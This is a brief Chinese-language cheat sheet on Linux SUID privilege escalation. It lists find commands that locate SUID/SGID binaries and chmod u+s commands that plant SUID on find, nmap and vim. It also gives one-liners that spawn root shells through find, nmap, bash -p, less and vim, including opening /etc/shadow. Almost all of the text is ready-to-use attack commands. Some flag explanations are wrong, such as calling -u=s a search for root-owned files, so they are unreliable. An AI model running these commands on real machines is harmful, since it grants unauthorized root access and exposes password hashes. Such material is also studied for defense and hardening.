SUID提权

SUID

以下语句可以用来搜索具备SUID权限的程序
find / -perm -g=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null 
find / -user root -perm -4000 -exec ls -ldb {} \; 
find / -user root -perm -4000 -print 2>/dev/null

/ 表示从文件系统的顶部（根）开始并找到每个目录
-perm 表示搜索随后的权限
-u=s 表示查找root用户拥有的文件
-type表示我们正在寻找的文件类型
f 表示常规文件，而不是目录或特殊文件
2 表示该进程的第二个文件描述符，即stderr（标准错误）
> 表示重定向
/dev/null 是一个特殊的文件系统对象，它将丢弃写入其中的所有内容。

添加SUID

chmod u+s /usr/bin/find
chmod u+s /usr/bin/nmap
chmod u+s /usr/bin/vim  等

提权
#find SUID
	find shell.php -exec /bin/bash  -p \;

#nmap
	nmap --interactive
	!sh

#bash
	bash -p 
		
#more/less
	less /etc/passwd 
	!/bin/sh
	
#vim
    vim.tiny /etc/shadow
    # Press ESC key
    :set shell=/bin/sh  #回车
    :shell
等